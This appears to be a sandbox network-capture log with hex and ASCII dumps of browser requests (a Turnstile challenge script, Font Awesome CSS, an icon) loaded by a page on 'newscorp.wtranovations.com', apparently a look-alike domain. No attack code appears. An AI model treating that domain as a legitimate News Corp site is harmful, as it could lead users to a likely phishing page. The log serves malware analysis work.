                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC1378INData Raw: 20 22 5d 2c 5b 64 2c 22 4e 6f 6b 69 61 22 5d 2c 5b 77 2c 70 5d 5d 2c 5b 2f 28 70 69 78 65 6c 20 63 29 5c 62 2f 69 5d 2c 5b 73 2c 5b 64 2c 71 5d 2c 5b 77 2c 6d 5d 5d 2c 5b 2f 64 72 6f 69 64 2e 2b 3b 20 28 70 69 78 65 6c 5b 5c 64 61 78 6c 20 5d 7b 30 2c 36 7d 29 28 3f 3a 20 62 75 69 7c 5c 29 29 2f 69 5d 2c 5b 73 2c 5b 64 2c 71 5d 2c 5b 77 2c 70 5d 5d 2c 5b 2f 64 72 6f 69 64 2e 2b 20 28 61 3f 5c 64 5b 30 2d 32 5d 7b 32 7d 73 6f 7c 5b 63 2d 67 5d 5c 64 7b 34 7d 7c 73 6f 5b 2d 67 6c 5d 5c 77 2b 7c 78 71 2d 61 5c 77 5b 34 2d 37 5d 5b 31 32 5d 29 28 3f 3d 20 62 75 69 7c 5c 29 2e 2b 63 68 72 6f 6d 65 5c 2f 28 3f 21 5b 31 2d 36 5d 7b 30 2c 31 7d 5c 64 5c 2e 29 29 2f 69 5d 2c 5b 73 2c 5b 64 2c 50 5d 2c 5b 77 2c 70 5d 5d 2c 5b 2f 73 6f 6e 79 20 74 61 62 6c 65 74 20
                                                                                                                                                                                                                      Data Ascii: "],[d,"Nokia"],[w,p]],[/(pixel c)\b/i],[s,[d,q],[w,m]],[/droid.+; (pixel[\daxl ]{0,6})(?: bui|\))/i],[s,[d,q],[w,p]],[/droid.+ (a?\d[0-2]{2}so|[c-g]\d{4}|so[-gl]\w+|xq-a\w[4-7][12])(?= bui|\).+chrome\/(?![1-6]{0,1}\d\.))/i],[s,[d,P],[w,p]],[/sony tablet
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC1378INData Raw: 6f 6e 7c 61 63 65 72 7c 61 73 75 73 7c 64 65 6c 6c 7c 6d 65 69 7a 75 7c 6d 6f 74 6f 72 6f 6c 61 7c 70 6f 6c 79 74 72 6f 6e 7c 69 6e 66 69 6e 69 78 7c 74 65 63 6e 6f 29 5b 2d 5f 20 5d 3f 28 5b 2d 5c 77 5d 2a 29 2f 69 2c 2f 28 68 70 29 20 28 5b 5c 77 20 5d 2b 5c 77 29 2f 69 2c 2f 28 61 73 75 73 29 2d 3f 28 5c 77 2b 29 2f 69 2c 2f 28 6d 69 63 72 6f 73 6f 66 74 29 3b 20 28 6c 75 6d 69 61 5b 5c 77 20 5d 2b 29 2f 69 2c 2f 28 6c 65 6e 6f 76 6f 29 5b 2d 5f 20 5d 3f 28 5b 2d 5c 77 5d 2b 29 2f 69 2c 2f 28 6a 6f 6c 6c 61 29 2f 69 2c 2f 28 6f 70 70 6f 29 20 3f 28 5b 5c 77 20 5d 2b 29 20 62 75 69 2f 69 5d 2c 5b 64 2c 73 2c 5b 77 2c 70 5d 5d 2c 5b 2f 28 6b 6f 62 6f 29 5c 73 28 65 72 65 61 64 65 72 7c 74 6f 75 63 68 29 2f 69 2c 2f 28 61 72 63 68 6f 73 29 20 28 67 61 6d
                                                                                                                                                                                                                      Data Ascii: on|acer|asus|dell|meizu|motorola|polytron|infinix|tecno)[-_ ]?([-\w]*)/i,/(hp) ([\w ]+\w)/i,/(asus)-?(\w+)/i,/(microsoft); (lumia[\w ]+)/i,/(lenovo)[-_ ]?([-\w]+)/i,/(jolla)/i,/(oppo) ?([\w ]+) bui/i],[d,s,[w,p]],[/(kobo)\s(ereader|touch)/i,/(archos) (gam
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC1378INData Raw: 65 5c 5f 29 3f 28 76 28 31 5b 30 34 35 5d 7c 32 5b 30 31 35 5d 7c 5b 33 34 36 39 5d 30 7c 37 5b 30 35 5d 29 29 20 62 2f 69 5d 2c 5b 5b 64 2c 22 56 6f 69 63 65 22 5d 2c 73 2c 5b 77 2c 70 5d 5d 2c 5b 2f 5c 62 28 6c 76 74 65 6c 5c 2d 29 3f 28 76 31 5b 31 32 5d 29 20 62 2f 69 5d 2c 5b 5b 64 2c 22 4c 76 54 65 6c 22 5d 2c 73 2c 5b 77 2c 70 5d 5d 2c 5b 2f 5c 62 28 70 68 2d 31 29 20 2f 69 5d 2c 5b 73 2c 5b 64 2c 22 45 73 73 65 6e 74 69 61 6c 22 5d 2c 5b 77 2c 70 5d 5d 2c 5b 2f 5c 62 28 76 28 31 30 30 6d 64 7c 37 30 30 6e 61 7c 37 30 31 31 7c 39 31 37 67 29 2e 2a 5c 62 29 20 62 2f 69 5d 2c 5b 73 2c 5b 64 2c 22 45 6e 76 69 7a 65 6e 22 5d 2c 5b 77 2c 6d 5d 5d 2c 5b 2f 5c 62 28 74 72 69 6f 5b 2d 5c 77 5c 2e 20 5d 2b 29 20 62 2f 69 5d 2c 5b 73 2c 5b 64 2c 22 4d 61 63
                                                                                                                                                                                                                      Data Ascii: e\_)?(v(1[045]|2[015]|[3469]0|7[05])) b/i],[[d,"Voice"],s,[w,p]],[/\b(lvtel\-)?(v1[12]) b/i],[[d,"LvTel"],s,[w,p]],[/\b(ph-1) /i],[s,[d,"Essential"],[w,p]],[/\b(v(100md|700na|7011|917g).*\b) b/i],[s,[d,"Envizen"],[w,m]],[/\b(trio[-\w\. ]+) b/i],[s,[d,"Mac
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC1378INData Raw: 64 2c 50 5d 2c 5b 77 2c 75 5d 5d 2c 5b 2f 5c 62 28 78 62 6f 78 28 3f 3a 20 6f 6e 65 29 3f 28 3f 21 3b 20 78 62 6f 78 29 29 5b 5c 29 3b 20 5d 2f 69 5d 2c 5b 73 2c 5b 64 2c 41 5d 2c 5b 77 2c 75 5d 5d 2c 5b 2f 28 28 70 65 62 62 6c 65 29 29 61 70 70 2f 69 5d 2c 5b 64 2c 73 2c 5b 77 2c 68 5d 5d 2c 5b 2f 28 77 61 74 63 68 29 28 3f 3a 20 3f 6f 73 5b 2c 5c 2f 5d 7c 5c 64 2c 5c 64 5c 2f 29 5b 5c 64 5c 2e 5d 2b 2f 69 5d 2c 5b 73 2c 5b 64 2c 78 5d 2c 5b 77 2c 68 5d 5d 2c 5b 2f 64 72 6f 69 64 2e 2b 3b 20 28 67 6c 61 73 73 29 20 5c 64 2f 69 5d 2c 5b 73 2c 5b 64 2c 71 5d 2c 5b 77 2c 68 5d 5d 2c 5b 2f 64 72 6f 69 64 2e 2b 3b 20 28 77 74 36 33 3f 30 7b 32 2c 33 7d 29 5c 29 2f 69 5d 2c 5b 73 2c 5b 64 2c 4d 5d 2c 5b 77 2c 68 5d 5d 2c 5b 2f 28 71 75 65 73 74 28 20 5c 64 7c
                                                                                                                                                                                                                      Data Ascii: d,P],[w,u]],[/\b(xbox(?: one)?(?!; xbox))[\); ]/i],[s,[d,A],[w,u]],[/((pebble))app/i],[d,s,[w,h]],[/(watch)(?: ?os[,\/]|\d,\d\/)[\d\.]+/i],[s,[d,x],[w,h]],[/droid.+; (glass) \d/i],[s,[d,q],[w,h]],[/droid.+; (wt63?0{2,3})\)/i],[s,[d,M],[w,h]],[/(quest( \d|


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      10192.168.11.1249387104.18.95.41443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC377OUTGET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1
                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC386INHTTP/1.1 302 Found
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:05 GMT
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                      cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                                                                                                                                                      cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                      location: /turnstile/v0/b/708f7a809116/api.js
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23b6aaa86762-ATL
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      11192.168.11.1249388104.17.24.14443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC387OUTGET /ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css HTTP/1.1
                                                                                                                                                                                                                      Host: cdnjs.cloudflare.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC946INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:05 GMT
                                                                                                                                                                                                                      Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                      Cache-Control: public, max-age=30672000
                                                                                                                                                                                                                      ETag: W/"619c057b-44be"
                                                                                                                                                                                                                      Last-Modified: Mon, 22 Nov 2021 21:02:51 GMT
                                                                                                                                                                                                                      cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                                                      Age: 123120
                                                                                                                                                                                                                      Expires: Wed, 11 Mar 2026 14:29:05 GMT
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1ie%2FUZNOcgRMxksWfoosxEsI8l9Za1RwDob%2FfOSDQ0qlZulo35dW%2FzHrNYFE9HUaJCwB7LWeUhlW4uC80d9d8v7x8fplm7WO1TqGbT229evlSxe3A5sxw2Ttj2zt2vdT%2BLGl05Pt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23b6aa2653b4-ATL
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC423INData Raw: 37 62 66 64 0d 0a 2f 2a 21 0a 20 2a 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 46 72 65 65 20 36 2e 30 2e 30 2d 62 65 74 61 33 20 62 79 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 0a 20 2a 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 2f 6c 69 63 65 6e 73 65 2f 66 72 65 65 20 28 49 63 6f 6e 73 3a 20 43 43 20 42 59 20 34 2e 30 2c 20 46 6f 6e 74 73 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 6f 64 65 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 31 20 46 6f 6e 74 69 63 6f 6e 73 2c 20 49 6e 63 2e 0a 20 2a 2f 0a 2e 66 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 2d 2d 66 61
                                                                                                                                                                                                                      Data Ascii: 7bfd/*! * Font Awesome Free 6.0.0-beta3 by @fontawesome - https://fontawesome.com * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) * Copyright 2021 Fonticons, Inc. */.fa{font-family:var(--fa
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC1369INData Raw: 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 67 72 61 79 73 63 61 6c 65 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 3b 64 69 73 70 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 64 69 73 70 6c 61 79 2c 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 29 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 76 61 72 69 61 6e 74 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 74 65 78 74 2d 72 65 6e 64 65 72 69 6e 67 3a 61 75 74 6f 7d 2e 66 61 2d 31 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 2e 66 61 2d 32 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 65 6d 7d 2e 66 61 2d 33 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 65 6d 7d 2e 66 61 2d 34 78 7b 66 6f 6e 74 2d 73
                                                                                                                                                                                                                      Data Ascii: moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-s
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC1369INData Raw: 72 28 2d 2d 66 61 2d 70 75 6c 6c 2d 6d 61 72 67 69 6e 2c 2e 33 65 6d 29 7d 2e 66 61 2d 62 65 61 74 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 61 6e 69 6d 61 74
                                                                                                                                                                                                                      Data Ascii: r(--fa-pull-margin,.3em)}.fa-beat{-webkit-animation-name:fa-beat;animation-name:fa-beat;-webkit-animation-delay:var(--fa-animation-delay,0);animation-delay:var(--fa-animation-delay,0);-webkit-animation-direction:var(--fa-animation-direction,normal);animat
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC1369INData Raw: 61 74 69 6f 6e 2c 31 73 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 31 73 29 7d 2e 66 61 2d 62 65 61 74 2d 66 61 64 65 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 2d 66 61 64 65 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 2d 66 61 64 65 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e
                                                                                                                                                                                                                      Data Ascii: ation,1s);animation-duration:var(--fa-animation-duration,1s)}.fa-beat-fade{-webkit-animation-name:fa-beat-fade;animation-name:fa-beat-fade;-webkit-animation-iteration-count:var(--fa-animation-iteration-count,infinite);animation-iteration-count:var(--fa-an
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC1369INData Raw: 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 32 73 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 32 73 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e
                                                                                                                                                                                                                      Data Ascii: tion:var(--fa-animation-direction,normal);-webkit-animation-duration:var(--fa-animation-duration,2s);animation-duration:var(--fa-animation-duration,2s);-webkit-animation-iteration-count:var(--fa-animation-iteration-count,infinite);animation-iteration-coun
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC1369INData Raw: 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 73 3b 74 72 61 6e 73 69 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 73 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 30 73 3b 74 72 61 6e 73 69 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 30 73 7d 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 7b 30 25 2c 39 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 34 35 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73
                                                                                                                                                                                                                      Data Ascii: tion-delay:0s;transition-delay:0s;-webkit-transition-duration:0s;transition-duration:0s}}@-webkit-keyframes fa-beat{0%,90%{-webkit-transform:scale(1);transform:scale(1)}45%{-webkit-transform:scale(var(--fa-beat-scale,1.25));transform:scale(var(--fa-beat-s
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC1369INData Raw: 2d 66 61 2d 66 6c 69 70 2d 79 2c 31 29 2c 76 61 72 28 2d 2d 66 61 2d 66 6c 69 70 2d 7a 2c 30 29 2c 76 61 72 28 2d 2d 66 61 2d 66 6c 69 70 2d 61 6e 67 6c 65 2c 2d 31 38 30 64 65 67 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 33 64 28 76 61 72 28 2d 2d 66 61 2d 66 6c 69 70 2d 78 2c 30 29 2c 76 61 72 28 2d 2d 66 61 2d 66 6c 69 70 2d 79 2c 31 29 2c 76 61 72 28 2d 2d 66 61 2d 66 6c 69 70 2d 7a 2c 30 29 2c 76 61 72 28 2d 2d 66 61 2d 66 6c 69 70 2d 61 6e 67 6c 65 2c 2d 31 38 30 64 65 67 29 29 7d 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 73 70 69 6e 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d 74
                                                                                                                                                                                                                      Data Ascii: -fa-flip-y,1),var(--fa-flip-z,0),var(--fa-flip-angle,-180deg));transform:rotate3d(var(--fa-flip-x,0),var(--fa-flip-y,1),var(--fa-flip-z,0),var(--fa-flip-angle,-180deg))}}@-webkit-keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}t
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC1369INData Raw: 30 22 7d 2e 66 61 2d 31 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 33 31 22 7d 2e 66 61 2d 32 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 33 32 22 7d 2e 66 61 2d 33 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 33 33 22 7d 2e 66 61 2d 34 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 33 34 22 7d 2e 66 61 2d 35 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 33 35 22 7d 2e 66 61 2d 36 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 33 36 22 7d 2e 66 61 2d 37 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 33 37 22 7d 2e 66 61 2d 38 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 33 38 22 7d 2e 66 61 2d 39 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 33 39 22 7d 2e 66 61 2d 61 3a 62 65 66
                                                                                                                                                                                                                      Data Ascii: 0"}.fa-1:before{content:"\31"}.fa-2:before{content:"\32"}.fa-3:before{content:"\33"}.fa-4:before{content:"\34"}.fa-5:before{content:"\35"}.fa-6:before{content:"\36"}.fa-7:before{content:"\37"}.fa-8:before{content:"\38"}.fa-9:before{content:"\39"}.fa-a:bef
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC1369INData Raw: 77 6e 2d 61 6c 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 38 38 36 22 7d 2e 66 61 2d 61 72 72 6f 77 2d 64 6f 77 6e 2d 61 2d 7a 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 73 6f 72 74 2d 61 6c 70 68 61 2d 61 73 63 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 73 6f 72 74 2d 61 6c 70 68 61 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 35 64 22 7d 2e 66 61 2d 61 72 72 6f 77 2d 64 6f 77 6e 2d 6c 6f 6e 67 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 6c 6f 6e 67 2d 61 72 72 6f 77 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 37 35 22 7d 2e 66 61 2d 61 72 72 6f 77 2d 64 6f 77 6e 2d 73 68 6f 72 74 2d 77 69 64 65 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 73 6f 72 74 2d 61 6d 6f 75 6e 74 2d 64 65 73 63 3a 62 65 66 6f 72 65
                                                                                                                                                                                                                      Data Ascii: wn-alt:before{content:"\f886"}.fa-arrow-down-a-z:before,.fa-sort-alpha-asc:before,.fa-sort-alpha-down:before{content:"\f15d"}.fa-arrow-down-long:before,.fa-long-arrow-down:before{content:"\f175"}.fa-arrow-down-short-wide:before,.fa-sort-amount-desc:before
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC1369INData Raw: 2d 61 72 72 6f 77 2d 74 75 72 6e 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 6c 65 76 65 6c 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 34 39 22 7d 2e 66 61 2d 61 72 72 6f 77 2d 74 75 72 6e 2d 75 70 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 6c 65 76 65 6c 2d 75 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 34 38 22 7d 2e 66 61 2d 61 72 72 6f 77 2d 75 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 36 32 22 7d 2e 66 61 2d 61 72 72 6f 77 2d 75 70 2d 31 2d 39 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 73 6f 72 74 2d 6e 75 6d 65 72 69 63 2d 75 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 36 33 22 7d 2e 66 61 2d 61 72 72 6f 77 2d 75 70 2d 39 2d 31 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 73
                                                                                                                                                                                                                      Data Ascii: -arrow-turn-down:before,.fa-level-down:before{content:"\f149"}.fa-arrow-turn-up:before,.fa-level-up:before{content:"\f148"}.fa-arrow-up:before{content:"\f062"}.fa-arrow-up-1-9:before,.fa-sort-numeric-up:before{content:"\f163"}.fa-arrow-up-9-1:before,.fa-s


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      12192.168.11.1249389172.66.42.211443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC427OUTGET /data/icons/ionicons/512/icon-close-round-512.png HTTP/1.1
                                                                                                                                                                                                                      Host: cdn4.iconfinder.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: image/png,image/svg+xml,image/*;q=0.8,video/*;q=0.8,*/*;q=0.5
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC1198INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:05 GMT
                                                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                                                      Content-Length: 3342
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                      Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                      Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                                                      Cf-Polished: origSize=6459
                                                                                                                                                                                                                      Content-Disposition: inline; filename="568139.png"
                                                                                                                                                                                                                      Expires: Sat, 21 Mar 2026 14:29:05 GMT
                                                                                                                                                                                                                      Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                                                                                                      Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1739995219&sid=c46efe9b-d3d2-4a0c-8c76-bfafa16c5add&s=J5yafVwiznLDsWPsONAqf1a6tRMttxbHnFHFaMwU3F8%3D"}]}
